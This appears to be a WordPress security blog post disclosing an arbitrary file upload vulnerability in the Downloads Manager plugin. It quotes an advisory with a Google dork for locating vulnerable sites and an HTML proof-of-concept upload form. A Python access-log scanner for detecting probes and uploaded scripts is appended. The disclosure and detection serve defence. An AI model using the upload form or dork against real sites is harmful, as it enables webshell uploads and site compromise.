One of the things we do to make sure we are providing our customers with the best data on the vulnerabilities that exist and are being exploited in WordPress plugins is to monitor our websites for hacking attempts. Through that we have found quite a few vulnerabilities in the current versions of plugins that it looks like hackers have already started exploiting.
There have been periods where we have been spotting those quite often and others where there are long periods between discoveries. We have recently been in a slow period, but that has just changed, as yesterday we spotted an arbitrary file upload vulnerability in Genesis Simple Defaults and today we found the same type of vulnerability in the plugin Downloads Manager.
This time it started with a request for the file /wp-content/plugins/downloads-manager/single-download-template.tpl on one of the websites, which looked to be someone probing for usage of the Downloads Manager plugin. Based on the name, our first thought was that there was a vulnerability in its download capability that would allow you to download an arbitrary file from the website, but as we started to take a look at the plugin we found it had a file upload capability on one of the plugin’s pages in the admin area of WordPress:
#########################################################
# Exploit Title: Wordpress Downloads Manager Arbitrary File Upload Vulnerability
# Category: webapps
# version affected : 1.0
# Google Dork : inurl:wp-content/plugins/downloads-manager/
# Index of /wp-content/plugins/downloads-manager
########################################################
-------------------------------------------------------------------------------
#
#
# File Path
#
# /wp-content/plugins/downloads-manager/upload/
#
Proof of Concept
```html
<html>
<body>
<form action="http://[path to WordPress]" method="POST" enctype="multipart/form-data">
<input type="hidden" name="dm_upload" />
<input type="file" name="upfile" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
```
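An added example, not code from the original post: a log check for the two request patterns named above, the probe for single-download-template.tpl and requests for script files under the plugin's upload/ directory. The Combined Log Format, the list of executable extensions and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

PLUGIN_DIR = "/wp-content/plugins/downloads-manager/"
PROBE_FILE = PLUGIN_DIR + "single-download-template.tpl"  # probe seen in the post
UPLOAD_DIR = PLUGIN_DIR + "upload/"                        # file path from the advisory
# Assumption: extensions a PHP host may execute, including "name.php.jpg"
# style double extensions that some Apache handler configurations run.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(\.|$)")
# Combined Log Format: ip ident user [time] "METHOD target PROTO" status ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify(line):
    """Return (ip, finding, path, status) for a suspicious line, else None."""
    m = LINE.match(line)
    if not m:
        return None
    ip, _method, target, status = m.groups()
    # Drop the query string, decode %xx, collapse "//" and ignore case so
    # trivially obfuscated requests still match.
    raw_path = unquote(target.split("?", 1)[0])
    path = re.sub(r"/{2,}", "/", raw_path).lower()
    if path == PROBE_FILE:
        return (ip, "plugin-probe", path, int(status))
    if path.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(path[len(UPLOAD_DIR):]):
        return (ip, "script-in-upload-dir", path, int(status))
    return None

def scan(lines):
    """Classify every log line and keep only the findings."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines (documentation IP ranges, made-up file names).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-content/plugins/downloads-manager/single-download-template.tpl HTTP/1.1" 404 512',
    '192.0.2.4 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php HTTP/1.1" 200 9000',
    '192.0.2.4 - - [01/Jan/2024:10:00:09 +0000] "GET /wp-content/plugins/downloads-manager/upload/manual.pdf HTTP/1.1" 200 90000',
    '198.51.100.9 - - [01/Jan/2024:10:01:00 +0000] "GET /wp-content/plugins/downloads-manager/upload/sample.php?x=1 HTTP/1.1" 200 20',
    '198.51.100.9 - - [01/Jan/2024:10:01:30 +0000] "GET /wp-content/plugins/downloads-manager//upload/img.PHP.jpg HTTP/1.1" 403 199',
]

if __name__ == "__main__":
    for ip, finding, path, status in scan(SAMPLE_LOG):
        print(f"{finding:22} {status} {ip:15} {path}")
```

A 200 response on a script-in-upload-dir finding means the file exists and was served, so that directory should be inspected first.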